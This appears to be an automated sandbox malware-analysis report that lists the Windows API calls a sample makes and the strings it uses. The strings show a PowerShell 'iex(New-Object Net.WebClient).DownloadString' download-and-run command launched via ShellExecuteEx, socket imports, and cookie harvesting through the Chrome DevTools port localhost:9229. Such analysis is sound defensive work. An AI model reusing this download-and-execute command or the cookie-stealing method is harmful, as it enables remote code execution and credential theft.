                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAC41
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAC84
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003AAC8E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AACB7
                              • lstrlen.KERNEL32(003C4AD4), ref: 003AACD1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AACF3
                              • lstrcat.KERNEL32(00000000,003C4AD4), ref: 003AACFF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAD28
                              • lstrlen.KERNEL32(003C4AD4), ref: 003AAD3A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAD5C
                              • lstrcat.KERNEL32(00000000,003C4AD4), ref: 003AAD68
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAD91
                              • lstrlen.KERNEL32(00F2F268), ref: 003AADA7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AADCF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003AADDA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAE03
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AAE3F
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003AAE49
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAE6F
                              • lstrlen.KERNEL32(00000000), ref: 003AAE85
                              • lstrcpy.KERNEL32(00000000,00F2F280), ref: 003AAEB8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen
                              • String ID: f
                              • API String ID: 2762123234-1993550816
                              • Opcode ID: 44dbc7a47298a27208794b1629e9a1afe34956670de13471de83a62526a789ed
                              • Instruction ID: d12f6d8eb35d6a7a52bcf8ef07eedfc332e5740e25a75919863dd6878636e8ae
                              • Opcode Fuzzy Hash: 44dbc7a47298a27208794b1629e9a1afe34956670de13471de83a62526a789ed
                              • Instruction Fuzzy Hash: 33B15832912E16AFCB23EB68DC49AAFB7B9FF51301F060424A815EB251DB34DD15CB91
                              APIs
                              • LoadLibraryA.KERNEL32(ws2_32.dll,?,003A72A4), ref: 003B47E6
                              • GetProcAddress.KERNEL32(00000000,connect), ref: 003B47FC
                              • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 003B480D
                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 003B481E
                              • GetProcAddress.KERNEL32(00000000,htons), ref: 003B482F
                              • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 003B4840
                              • GetProcAddress.KERNEL32(00000000,recv), ref: 003B4851
                              • GetProcAddress.KERNEL32(00000000,socket), ref: 003B4862
                              • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 003B4873
                              • GetProcAddress.KERNEL32(00000000,closesocket), ref: 003B4884
                              • GetProcAddress.KERNEL32(00000000,send), ref: 003B4895
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                              • API String ID: 2238633743-3087812094
                              • Opcode ID: 4fca21ca1a454d60859ad96db5fc538e1f75436cc13d937c209a7c74aa11c9e6
                              • Instruction ID: 936ea46a0b11e41a340d2c158e1129362cc3f6b1f86a55aee188f004bc2f1a4a
                              • Opcode Fuzzy Hash: 4fca21ca1a454d60859ad96db5fc538e1f75436cc13d937c209a7c74aa11c9e6
                              • Instruction Fuzzy Hash: E4119C71952F20EFCB129FB5AC0DFA63ABCBA29705309081EF551E2260DAF45848FB50
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003ABE53
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003ABE86
                              • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 003ABE91
                              • lstrcpy.KERNEL32(00000000,?), ref: 003ABEB1
                              • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 003ABEBD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABEE0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003ABEEB
                              • lstrlen.KERNEL32(')"), ref: 003ABEF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABF13
                              • lstrcat.KERNEL32(00000000,')"), ref: 003ABF1F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABF46
                              • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 003ABF66
                              • lstrcpy.KERNEL32(00000000,?), ref: 003ABF88
                              • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 003ABF94
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABFBA
                              • ShellExecuteEx.SHELL32(?), ref: 003AC00C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 4016326548-898575020
                              • Opcode ID: b99d6f5159d3eb1cd11c25899b32b281ae185cb8407c038fcbd788dc49bcdf20
                              • Instruction ID: 8f269bebd85f853f07730e831e812f2793bea7d5ff39664807092b6bf8fa1699
                              • Opcode Fuzzy Hash: b99d6f5159d3eb1cd11c25899b32b281ae185cb8407c038fcbd788dc49bcdf20
                              • Instruction Fuzzy Hash: 75619431A11A1AAFCF23AFB59C49EAFBBA8EF15300F051429F505E7202DB34C9158B90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B184F
                              • lstrlen.KERNEL32(00F16E90), ref: 003B1860
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1887
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003B1892
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B18C1
                              • lstrlen.KERNEL32(003C4FA0), ref: 003B18D3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B18F4
                              • lstrcat.KERNEL32(00000000,003C4FA0), ref: 003B1900
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B192F
                              • lstrlen.KERNEL32(00F16EC0), ref: 003B1945
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B196C
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003B1977
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B19A6
                              • lstrlen.KERNEL32(003C4FA0), ref: 003B19B8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B19D9
                              • lstrcat.KERNEL32(00000000,003C4FA0), ref: 003B19E5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1A14
                              • lstrlen.KERNEL32(00F16F00), ref: 003B1A2A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1A51
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003B1A5C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1A8B
                              • lstrlen.KERNEL32(00F16F20), ref: 003B1AA1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1AC8
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003B1AD3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1B02
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen
                              • String ID:
                              • API String ID: 1049500425-0
                              • Opcode ID: 6bde7931071b7e2b8cca03aa1226f1f67a430859662aa25891c45fbfa894fefc
                              • Instruction ID: 933162fc1c724cb21f72408b139d4b22db550cb977e0199a2d6c2b936e0d37ee
                              • Opcode Fuzzy Hash: 6bde7931071b7e2b8cca03aa1226f1f67a430859662aa25891c45fbfa894fefc
                              • Instruction Fuzzy Hash: 83917E71601B03AFDB229FB5DCA8E6BB7E8EF14304B554828B986C7651DB34EC45CB50
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A4793
                              • LocalAlloc.KERNEL32(00000040,?), ref: 003A47C5
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A4812
                              • lstrlen.KERNEL32(003C4B60), ref: 003A481D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A483A
                              • lstrcat.KERNEL32(00000000,003C4B60), ref: 003A4846
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A486B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4898
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A48A3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A48CA
                              • StrStrA.SHLWAPI(?,00000000), ref: 003A48DC
                              • lstrlen.KERNEL32(?), ref: 003A48F0
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A4931
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A49B8
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A49E1
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A4A0A
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A4A30
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A4A5D
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 4107348322-3310892237
                              • Opcode ID: 986eee9d89a94f42d7b9b276d8a8f00bb9b979989121b6b511ae58fadd63fee5
                              • Instruction ID: 96b3f336711d176b6603e180c4ffa54eb5a524c25c3169909852ff0bb205b95f
                              • Opcode Fuzzy Hash: 986eee9d89a94f42d7b9b276d8a8f00bb9b979989121b6b511ae58fadd63fee5
                              • Instruction Fuzzy Hash: FDB18232A11A06ABCF23EF75D84A9AF77B9EF95300F054528F8469B211DB74EC158B90
                              APIs
                                • Part of subcall function 003990C0: InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 003990DF
                                • Part of subcall function 003990C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003990FC
                                • Part of subcall function 003990C0: InternetCloseHandle.WININET(00000000), ref: 00399109
                              • strlen.MSVCRT ref: 003992E1
                              • strlen.MSVCRT ref: 003992FA
                                • Part of subcall function 00398980: std::_Xinvalid_argument.LIBCPMT ref: 00398996
                              • strlen.MSVCRT ref: 00399399
                              • strlen.MSVCRT ref: 003993E6
                              • lstrcat.KERNEL32(?,cookies), ref: 00399547
                              • lstrcat.KERNEL32(?,003C1794), ref: 00399559
                              • lstrcat.KERNEL32(?,?), ref: 0039956A
                              • lstrcat.KERNEL32(?,003C4B98), ref: 0039957C
                              • lstrcat.KERNEL32(?,?), ref: 0039958D
                              • lstrcat.KERNEL32(?,.txt), ref: 0039959F
                              • lstrlen.KERNEL32(?), ref: 003995B6
                              • lstrlen.KERNEL32(?), ref: 003995DB
                              • lstrcpy.KERNEL32(00000000,?), ref: 00399614
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                              • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                              • API String ID: 1201316467-3542011879
                              • Opcode ID: 8c83faa61bbb01270207aedae7e3e777a2cca32b5ac3bc42e8cb1f525b2f03a6
                              • Instruction ID: 8a3187d46f8063a60adb99c40e43dec2a42e4a4eefe0a53f4d8f02c9ee863879
                              • Opcode Fuzzy Hash: 8c83faa61bbb01270207aedae7e3e777a2cca32b5ac3bc42e8cb1f525b2f03a6
                              • Instruction Fuzzy Hash: B6E11471E11218EFDF12DFA8D885BDEBBB5BF48300F1044AAE509A7241DB70AE45CB95
                              APIs
                              • memset.MSVCRT ref: 003AD9A1
                              • memset.MSVCRT ref: 003AD9B3
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AD9DB
                              • lstrcpy.KERNEL32(00000000,?), ref: 003ADA0E
                              • lstrcat.KERNEL32(?,00000000), ref: 003ADA1C
                              • lstrcat.KERNEL32(?,00F2F670), ref: 003ADA36
                              • lstrcat.KERNEL32(?,?), ref: 003ADA4A
                              • lstrcat.KERNEL32(?,00F2DA98), ref: 003ADA5E
                              • lstrcpy.KERNEL32(00000000,?), ref: 003ADA8E
                              • GetFileAttributesA.KERNEL32(00000000), ref: 003ADA95
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003ADAFE
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 2367105040-0
                              • Opcode ID: a708292d9a5ee2c14a076dba10e22839f3b700a01096cd4dfcf580e215855533
                              • Instruction ID: b1543c71834db903fd512f1a941f0e5963fa0d610ee7fec1c1e2e7766563a2d6
                              • Opcode Fuzzy Hash: a708292d9a5ee2c14a076dba10e22839f3b700a01096cd4dfcf580e215855533
                              • Instruction Fuzzy Hash: 7EB19EB2910659AFCF12EFA4DC889EE77B9FF49300F054569E906E7250DB309E49CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039B330
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B37E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B3A9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039B3B1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B3D9
                              • lstrlen.KERNEL32(003C4C50), ref: 0039B450
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B474
                              • lstrcat.KERNEL32(00000000,003C4C50), ref: 0039B480
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B4A9
                              • lstrlen.KERNEL32(00000000), ref: 0039B52D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B557
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039B55F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B587
                              • lstrlen.KERNEL32(003C4AD4), ref: 0039B5FE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B622
                              • lstrcat.KERNEL32(00000000,003C4AD4), ref: 0039B62E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B65E
                              • lstrlen.KERNEL32(?), ref: 0039B767
                              • lstrlen.KERNEL32(?), ref: 0039B776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B79E
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
